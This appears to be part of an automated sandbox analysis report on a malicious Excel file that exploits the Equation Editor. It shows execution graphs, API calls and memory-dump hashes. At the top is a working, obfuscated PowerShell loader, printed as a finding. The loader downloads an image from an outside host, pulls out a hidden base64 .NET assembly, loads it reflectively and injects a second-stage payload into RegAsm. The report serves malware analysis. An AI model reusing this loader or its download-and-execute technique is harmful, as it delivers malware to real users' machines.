        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
        Imagebase:0xf00000
        File size:427'008 bytes
        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Call Graph

        • Entrypoint
        • Decryption Function
        • Executed
        • Not Executed
        • Show Help
        callgraph 1 Error: Graph is empty

        Module: Sheet1

        Declaration
        LineContent
        1

        Attribute VB_Name = "Sheet1"

        2

        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = False

        8

        Attribute VB_Customizable = True

        Module: Sheet2

        Declaration
        LineContent
        1

        Attribute VB_Name = "Sheet2"

        2

        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = False

        8

        Attribute VB_Customizable = True

        Module: Sheet3

        Declaration
        LineContent
        1

        Attribute VB_Name = "Sheet3"

        2

        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = False

        8

        Attribute VB_Customizable = True

        Module: ThisWorkbook

        Declaration
        LineContent
        1

        Attribute VB_Name = "ThisWorkbook"

        2

        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = False

        8

        Attribute VB_Customizable = True

        Reset < >

          Execution Graph

          Execution Coverage:27%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:82.8%
          Total number of Nodes:29
          Total number of Limit Nodes:3
          execution_graph 175 35b04d3 176 35b04d5 175->176 179 35b04e8 LoadLibraryW 176->179 184 35b0502 179->184 185 35b0505 184->185 187 35b0513 185->187 188 35b05a1 URLDownloadToFileW 185->188 198 35b05ba 188->198 191 35b05c1 193 35b05c9 ShellExecuteW 191->193 195 35b062e 191->195 207 35b05f4 193->207 195->187 196 35b05e8 196->195 197 35b05f7 ExitProcess 196->197 199 35b05bc 198->199 200 35b05cf 3 API calls 199->200 201 35b05c1 200->201 202 35b05c9 ShellExecuteW 201->202 204 35b05aa 201->204 203 35b05f4 ExitProcess 202->203 205 35b05e8 203->205 204->191 209 35b05cf 204->209 205->204 206 35b05f7 ExitProcess 205->206 208 35b05f7 ExitProcess 207->208 210 35b05d2 ShellExecuteW 209->210 211 35b05f4 ExitProcess 210->211 212 35b05e8 210->212 211->212 213 35b062f 212->213 214 35b05f7 ExitProcess 212->214 213->191

          Callgraph

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 35b05a1-35b05bb URLDownloadToFileW call 35b05ba 4 35b05c1-35b05c7 0->4 5 35b05bc call 35b05cf 0->5 6 35b05c9-35b05eb ShellExecuteW call 35b05f4 4->6 7 35b062e-35b063a 4->7 5->4 9 35b063d 6->9 20 35b05ed 6->20 7->9 11 35b063f-35b0643 9->11 12 35b0645-35b0649 9->12 11->12 13 35b0651-35b0658 11->13 14 35b064b-35b064f 12->14 15 35b065e-35b0660 12->15 17 35b065a 13->17 18 35b065c 13->18 14->13 14->15 19 35b0670-35b0671 15->19 17->15 18->15 22 35b0662-35b066b 18->22 20->15 21 35b05ef-35b05f9 ExitProcess 20->21 22->19 23 35b062f-35b0632 22->23 25 35b066d 23->25 26 35b0634-35b0637 23->26 25->19 26->22 27 35b0639 26->27 27->9
          APIs
          • URLDownloadToFileW.URLMON(00000000,035B0513,?,00000000,00000000), ref: 035B05A3
            • Part of subcall function 035B05BA: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035B05E1
            • Part of subcall function 035B05BA: ExitProcess.KERNEL32(00000000,?,035B05E8), ref: 035B05F9
          Memory Dump Source
          • Source File: 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_9_2_35b0000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadExecuteExitFileProcessShell
          • String ID:
          • API String ID: 3584569557-0
          • Opcode ID: 1df214bee716b96eaa6968b6f5540d55c6cd68628a7b695f28ef3691da5ac5df
          • Instruction ID: 67c3006b8860679a9af2b60c6a713bd8eb6e31f0b96922994faec0a7509f3f09
          • Opcode Fuzzy Hash: 1df214bee716b96eaa6968b6f5540d55c6cd68628a7b695f28ef3691da5ac5df
          • Instruction Fuzzy Hash: EDF0279058C34529E712FB74AC9EFEB6E74BFC1B04F140889B1524F4F3DB949804C655

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 29 35b05cf-35b05e1 ShellExecuteW 31 35b05e8-35b05eb 29->31 32 35b05e3 call 35b05f4 29->32 34 35b063d 31->34 35 35b05ed 31->35 32->31 38 35b063f-35b0643 34->38 39 35b0645-35b0649 34->39 36 35b05ef-35b05f9 ExitProcess 35->36 37 35b065e-35b0660 35->37 42 35b0670-35b0671 37->42 38->39 40 35b0651-35b0658 38->40 39->37 41 35b064b-35b064f 39->41 44 35b065a 40->44 45 35b065c 40->45 41->37 41->40 44->37 45->37 47 35b0662-35b066b 45->47 47->42 48 35b062f-35b0632 47->48 49 35b066d 48->49 50 35b0634-35b0637 48->50 49->42 50->47 51 35b0639 50->51 51->34
          APIs
          • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035B05E1
            • Part of subcall function 035B05F4: ExitProcess.KERNEL32(00000000,?,035B05E8), ref: 035B05F9
          Memory Dump Source
          • Source File: 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_9_2_35b0000_EQNEDT32.jbxd
          Similarity
          • API ID: ExecuteExitProcessShell
          • String ID:
          • API String ID: 1124553745-0
          • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
          • Instruction ID: 96c254bdc624a2fb9c3db393d580e60decc5ad61c1cd65aaa1ffb64d4cb4ff48
          • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
          • Instruction Fuzzy Hash: 9901499994434721DF30EE28A856BF7AB31FBD1700FCC8846A9820B0F1D798D4C38AD9

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 52 35b05ba-35b05c7 call 35b05cf 56 35b05c9-35b05eb ShellExecuteW call 35b05f4 52->56 57 35b062e-35b063a 52->57 59 35b063d 56->59 70 35b05ed 56->70 57->59 61 35b063f-35b0643 59->61 62 35b0645-35b0649 59->62 61->62 63 35b0651-35b0658 61->63 64 35b064b-35b064f 62->64 65 35b065e-35b0660 62->65 67 35b065a 63->67 68 35b065c 63->68 64->63 64->65 69 35b0670-35b0671 65->69 67->65 68->65 72 35b0662-35b066b 68->72 70->65 71 35b05ef-35b05f9 ExitProcess 70->71 72->69 73 35b062f-35b0632 72->73 75 35b066d 73->75 76 35b0634-35b0637 73->76 75->69 76->72 77 35b0639 76->77 77->59
          Memory Dump Source
          • Source File: 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_9_2_35b0000_EQNEDT32.jbxd
          Similarity
          • API ID: ExecuteExitProcessShell
          • String ID:
          • API String ID: 1124553745-0
          • Opcode ID: 44608452cc0fe4775c69b6031ee34fbb171d552e4e7b263823cb43882b5357a0
          • Instruction ID: 5077409c9ea50592df8e98148d444b88ea56328b23165fadde899af2a01a760a
          • Opcode Fuzzy Hash: 44608452cc0fe4775c69b6031ee34fbb171d552e4e7b263823cb43882b5357a0
          • Instruction Fuzzy Hash: C4017D6454830A30EB70EE246C89BEFBAB1BBC1714F98845AF5924B0F1C79499C3C6DD

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 79 35b04e8-35b04ea LoadLibraryW call 35b0502 81 35b04ef-35b04f4 79->81 82 35b04f6-35b0560 call 35b05a1 81->82 83 35b0564-35b059b 81->83 82->83
          APIs
          • LoadLibraryW.KERNEL32(035B04DA), ref: 035B04E8
          Memory Dump Source
          • Source File: 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_9_2_35b0000_EQNEDT32.jbxd
          Similarity
          • API ID: LibraryLoad
          • String ID:
          • API String ID: 1029625771-0
          • Opcode ID: 1d529973895b3567389896803ef678da618fcbe330a462572b4deb6cad325730
          • Instruction ID: a9440b9adb3bb87b1e90ee138b8480c52a9d9a5fa3e8518243bd0cb277fff5bf
          • Opcode Fuzzy Hash: 1d529973895b3567389896803ef678da618fcbe330a462572b4deb6cad325730
          • Instruction Fuzzy Hash: C021C0A280C7D25FCB1787309D7A656BFB42A23104B5D86CEC4C60A8E3E399A511C7A7

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 91 35b05f4-35b05f9 ExitProcess
          APIs
          • ExitProcess.KERNEL32(00000000,?,035B05E8), ref: 035B05F9
          Memory Dump Source
          • Source File: 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_9_2_35b0000_EQNEDT32.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
          • Instruction ID: 9025420e9d9fec714a5c0eefb5798229e9bd4682d2bb61af0ec0efcdd83093a5
          • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
          • Instruction Fuzzy Hash: B9D017712016029FD204EF55DD80F67F77AFFC4611F28C265E5044B6A9DB30E892CAE0
          Strings
          Memory Dump Source
          • Source File: 0000000C.00000002.429756747.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_6f0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4'p$4'p$4'p$4'p$x;F$x;F$$p$$p$$p$$p$$p$$p$$p$$p$$p
          • API String ID: 0-162092046
          • Opcode ID: 71b613de7eaa0720ef3e7ec18865f4a2e3c8153089cba8f61a5600543e718b88
          • Instruction ID: bd72887f4687b27bc3d12bfbc6f7add907ca736dd307852e507e091c31344c2f
          • Opcode Fuzzy Hash: 71b613de7eaa0720ef3e7ec18865f4a2e3c8153089cba8f61a5600543e718b88
          • Instruction Fuzzy Hash: 98F1393170420ADFDB248A7998617BABBE3AFC6350F24806BDA45CB351DB71CD46CB91
          Strings
          Memory Dump Source
          • Source File: 0000000C.00000002.429756747.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_6f0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 89F$tPp$tPp
          • API String ID: 0-1291366237
          • Opcode ID: 45ed8e12d4e322b866019287cbdc94578c9d878c31b79ec823fa1fd228bf00c5
          • Instruction ID: cdd3612076bd446f02835b08840f6154b095d46d8ebf8c80bccfacdfc37338d6
          • Opcode Fuzzy Hash: 45ed8e12d4e322b866019287cbdc94578c9d878c31b79ec823fa1fd228bf00c5
          • Instruction Fuzzy Hash: 94A1E4307053489FD7259B68C851B7ABBA3AFC6310F28845AEA49DF392DE72DC42C751
          Memory Dump Source
          • Source File: 0000000C.00000002.429716742.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_210000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c825bc85519ef609c17b5363cab0d90758245fbc617edd80ef4b85e47d7cd47d
          • Instruction ID: 922729df1772bc1bda79d0b803e6033a59540c8a339bfc7251f87dc7db2a0606
          • Opcode Fuzzy Hash: c825bc85519ef609c17b5363cab0d90758245fbc617edd80ef4b85e47d7cd47d
          • Instruction Fuzzy Hash: 99222734A11249EFDB15CFA8D484ADDFBF2AF98310F248459E804AB361C775ED96CB90
          Memory Dump Source
          • Source File: 0000000C.00000002.429716742.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_210000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1b75878fa01bfee008e0989f1cf7dbbf8a81c11f77fd6ec505082d70d9f0722c
          • Instruction ID: f991851b68b16040e451be07bf63da30b4c6fcf37898ec0bfd7f128b5e6232a6
          • Opcode Fuzzy Hash: 1b75878fa01bfee008e0989f1cf7dbbf8a81c11f77fd6ec505082d70d9f0722c
          • Instruction Fuzzy Hash: 62510B74A10219AFDB14DFA8D480ADDFBF2AF88314F24C559E804AB355C775ED86CB90
          Memory Dump Source
          • Source File: 0000000C.00000002.429716742.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_210000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2735ea3076f2135be7cd7ed99999ba8373d34e2a4f3ffc13e37c58a50727f756
          • Instruction ID: 630492aed8f6f2c301859e4159246ec020e826e8323315d5b61ac5ed40241646
          • Opcode Fuzzy Hash: 2735ea3076f2135be7cd7ed99999ba8373d34e2a4f3ffc13e37c58a50727f756
          • Instruction Fuzzy Hash: 1B113274A10219AFDB04DFA8D484BADBBF2AF48314F24C458E804AB361C774ED86CB90
          Memory Dump Source
          • Source File: 0000000C.00000002.429690660.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d68372f9df02f7b3c6f6b25cf5b6e7dead976d9d1e3bb0a4cba417a09df33577
          • Instruction ID: 4740ccc81f01d63c09a204aa76274c8fc15af4d5263cb9dfc0e841f01e94adfe
          • Opcode Fuzzy Hash: d68372f9df02f7b3c6f6b25cf5b6e7dead976d9d1e3bb0a4cba417a09df33577
          • Instruction Fuzzy Hash: E701A771504344AEEB104E15EC84B67BFD8EF41724F2C851AFC494B286C779D845C6B1
          Memory Dump Source
          • Source File: 0000000C.00000002.429756747.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_6f0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 997a7717f75f841c00108e2a7a8b9b7ee0681512746a03368ada6621fa8f052c
          • Instruction ID: be9a15cc1182b49ffdbbe856bee40a336950166c55b28306d9f4cb97d82ea9ed
          • Opcode Fuzzy Hash: 997a7717f75f841c00108e2a7a8b9b7ee0681512746a03368ada6621fa8f052c
          • Instruction Fuzzy Hash: 2FF0227070034827DB606A798806BBF68EACFD9711F508419FA069F3C2DEB5AC448766
          Memory Dump Source
          • Source File: 0000000C.00000002.429690660.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d034d11a5d039849f4acea45614ba737f83c658b0098f8cdbf544e894d54d260
          • Instruction ID: 92522b57602ff3773ccece96e34556858d831d8ffdc663ddb74638e93b8fcacd
          • Opcode Fuzzy Hash: d034d11a5d039849f4acea45614ba737f83c658b0098f8cdbf544e894d54d260
          • Instruction Fuzzy Hash: 69F06271404344AFEB108A16DCC4B67FFD8EB41724F28C55AFD484E286C3799C44CAB1
          Memory Dump Source
          • Source File: 0000000C.00000002.429716742.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_210000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 69b2a3f9deb553c97b8104c98a1c95e50aa59c0c068afe08719d8275f69cecdc
          • Instruction ID: b4adcd3f50263273ed481d24c33f7fbe0ad525835538552dcd1f73659a7050ba
          • Opcode Fuzzy Hash: 69b2a3f9deb553c97b8104c98a1c95e50aa59c0c068afe08719d8275f69cecdc
          • Instruction Fuzzy Hash: 5AE0E5757001109BC2148A0CD8916AEF7A6FBC8615BB9956DE88A87388CB32ED83C791
          Strings
          Memory Dump Source
          • Source File: 0000000C.00000002.429756747.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_6f0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: <!$4'p$4'p$4'p$4'p$X:F$tPp$tPp$$p$$p$$p$$p$$p$$p$$p
          • API String ID: 0-746419788
          • Opcode ID: 36ff5e1c35ea580b694888efe4bafb151d50f87fb38ff1630f087944d4240de7
          • Instruction ID: 40532afcfec8d924a3e74587c551caedb09b2451410b1a01a43eb2ec69e045da
          • Opcode Fuzzy Hash: 36ff5e1c35ea580b694888efe4bafb151d50f87fb38ff1630f087944d4240de7
          • Instruction Fuzzy Hash: 60D10531B04349DFCB259B69C8507BABBA3AFC6390F28806BDA559F341DA31CD46C791
          Strings
          Memory Dump Source
          • Source File: 0000000C.00000002.429756747.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_6f0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$\9F$`8F$`8F$`8F$$p$$p
          • API String ID: 0-3955692485
          • Opcode ID: fbe8cdb3fe3595c403a263b798a3008c5e8de6a4674c85e88260d9bc1dd61832
          • Instruction ID: e5c74919bbedc87828e5dd30d3c3afd3be2dbeeb6c4679966f3e0732f5a29a2c
          • Opcode Fuzzy Hash: fbe8cdb3fe3595c403a263b798a3008c5e8de6a4674c85e88260d9bc1dd61832
          • Instruction Fuzzy Hash: 3ED12835700248DFEF259E68D8107BE7BE3AF81310F58846AEA458B392CB71DD45CBA1
          Strings
          Memory Dump Source
          • Source File: 0000000C.00000002.429756747.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_12_2_6f0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: $p$$p$$p$$p
          • API String ID: 0-3121760203
          • Opcode ID: 7bb49aa71e05900a32a2c52db8de70ed7533228ae9b66036ff8bd7ff512bb074
          • Instruction ID: 0827c1680126ab8f14963d46fb6c79c7b0f59c17aeb6f028fac2e44d4b064d73
          • Opcode Fuzzy Hash: 7bb49aa71e05900a32a2c52db8de70ed7533228ae9b66036ff8bd7ff512bb074
          • Instruction Fuzzy Hash: 8A21A136A0030B9BDB30CE54C9627BABBA7ABD4310F28416ADB1497301DB71DD46DF99